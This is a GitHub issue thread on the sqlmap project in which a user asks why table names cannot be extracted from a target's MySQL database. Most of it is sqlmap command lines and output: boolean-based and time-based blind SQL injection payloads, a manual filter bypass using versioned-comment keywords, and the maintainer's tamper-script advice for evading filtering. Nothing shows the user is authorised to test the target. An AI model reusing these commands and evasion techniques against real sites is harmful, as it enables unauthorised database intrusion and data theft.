sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org

cannot retrieve the table names #754

Closed semprul57 closed 10 years ago

semprul57 commented 10 years ago

Hi, I want to ask about this issue: I can't get the table names from this database. Before I ran this, I had already updated sqlmap to the latest version.

root@backbox:~$ sqlmap -u http://site.com/this.php?id=587 -p id --tables -D livewire

[!] Warning: This tool is located in /opt/backbox/sqlmap
[i] Remember to give the full absolute path when specifying a file

sqlmap/1.0-dev-5b2ded0 - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 06:33:15

[06:33:15] [INFO] resuming back-end DBMS 'mysql'
[06:33:18] [INFO] testing connection to the target URL

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: id
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: id=587 RLIKE (SELECT (CASE WHEN (5906=5906) THEN 587 ELSE 0x28 END))

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=587 AND SLEEP(5)

[06:33:25] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2000
web application technology: PHP 5.2.8, Microsoft IIS 5.0
back-end DBMS: MySQL 5
[06:33:25] [INFO] fetching tables for database: 'livewire'
[06:33:25] [INFO] fetching number of tables for database 'livewire'
[06:33:25] [INFO] retrieved:
[06:33:30] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[06:33:30] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[06:34:26] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[06:34:28] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads

[06:34:31] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[06:34:31] [WARNING] unable to retrieve the number of tables for database 'livewire'
[06:34:31] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] n
No tables found
[06:34:33] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 6 times
[06:34:33] [INFO] fetched data logged to text files under '/opt/backbox/sqlmap/output/site.com'

There is no difference when I add --hex or --no-cast. I also tried to check for a WAF, but there is no WAF.

When I try SQL injection manually, I must use /*!UNION*//*!SELECT*/ to get to this step. I don't know what I am supposed to do to get the table names.
Please help.

Thank You

stamparm commented 10 years ago

You should find an appropriate tamper script and rerun with --tamper ... --flush-session

stamparm commented 10 years ago

e.g. for your case --tamper=versionedkeywords

semprul57 commented 10 years ago

After I added --tamper=versionedkeywords and --flush-session I got another error, about providing --regexp and increasing --level/--risk.

And the result is:

root@backbox:~$ sqlmap -u http://site.com/this.php?id=587 -p id --tables -D livewire --hex --tamper=versionedkeywords --flush-session --regexp --level=5 --risk=3

[!] Warning: This tool is located in /opt/backbox/sqlmap
[i] Remember to give the full absolute path when specifying a file

sqlmap/1.0-dev-5b2ded0 - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 02:40:53

[02:40:53] [INFO] loading tamper script 'versionedkeywords'
[02:40:53] [WARNING] tamper script 'versionedkeywords' is only meant to be run against MySQL
[02:41:24] [INFO] testing connection to the target URL
[02:41:30] [INFO] testing if the provided regular expression matches within the target URL page content
[02:41:38] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[02:41:38] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
do you want to include all tests for 'MySQL' extending provided level (5) and risk (3)? [Y/n] y
[02:42:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:45:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[02:47:15] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[02:47:19] [WARNING] reflective value(s) found and filtering out
[02:47:19] [WARNING] frames detected containing attacked parameter values. Please be sure to test those separately in case that attack on this page fails
[02:49:02] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)'
[02:50:47] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[02:50:50] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[02:50:56] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[02:51:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[02:53:06] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[02:55:31] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
[02:58:11] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[02:58:28] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[02:58:45] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[02:58:59] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[02:59:03] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[02:59:07] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[02:59:15] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[02:59:23] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[03:00:42] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[03:02:01] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[03:03:19] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[03:04:24] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[03:05:22] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[03:06:27] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
[03:07:33] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[03:08:32] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[03:09:33] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[03:09:34] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[03:09:36] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[03:09:37] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[03:09:41] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
[03:09:44] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
[03:09:47] [INFO] testing 'MySQL inline queries'
[03:09:49] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[03:09:49] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[03:11:00] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[03:12:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[03:13:19] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[03:14:30] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[03:15:38] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[03:16:50] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
[03:17:51] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[03:18:51] [INFO] testing 'MySQL >= 5.0 time-based blind - Parameter replace'
[03:18:53] [INFO] testing 'MySQL < 5.0 time-based blind - Parameter replace (heavy queries)'
[03:18:54] [INFO] testing 'MySQL time-based blind - Parameter replace (bool*int)'
[03:19:57] [INFO] GET parameter 'id' is 'MySQL time-based blind - Parameter replace (bool*int)' injectable
[03:19:57] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[03:19:57] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[03:20:34] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[03:21:17] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[03:21:52] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
[03:22:24] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
[03:23:03] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
[03:23:35] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
[03:24:13] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
[03:24:44] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
[03:25:37] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns'
[03:26:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[03:26:51] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[03:27:29] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
[03:28:04] [INFO] testing 'Generic UNION query (random number) - 22 to 40 columns'
[03:28:38] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
[03:29:14] [INFO] testing 'Generic UNION query (random number) - 42 to 60 columns'
[03:29:44] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
[03:30:19] [INFO] testing 'Generic UNION query (random number) - 62 to 80 columns'
[03:30:52] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
[03:31:28] [INFO] testing 'Generic UNION query (random number) - 82 to 100 columns'
[03:32:05] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[03:33:51] [WARNING] false positive or unexploitable injection point detected
[03:33:51] [WARNING] GET parameter 'id' is not injectable
[03:33:51] [CRITICAL] all tested parameters appear to be not injectable. As heuristic test turned out positive you are strongly advised to continue on with the tests. Please, consider usage of tampering scripts as your target might filter the queries. Also, you can try to rerun by providing a valid value for option '--regexp' as perhaps the regular expression that you have chosen does not match exclusively True responses
[03:33:51] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 1638 times

[*] shutting down at 03:33:51

I don't know the valid --regexp value. If there is another option to add, please tell me.

Thank You

stamparm commented 10 years ago

I would say that you'll need to exploit this target manually

semprul57 commented 10 years ago

I've tried, and sqlmap succeeded in retrieving only 1 letter and then stopped. Any solution?

And if there's no solution, what keyword should I search for on Google for this case? Sorry for my bad English.

Thank You

stamparm commented 10 years ago

You have 403 (Forbidden) - 1638 times. Really can't help you here.

semprul57 commented 10 years ago

Alright, thank you for your help.

One question: what keyword should I search for on Google to do this manually, so I can learn and apply it to my website?

Thank You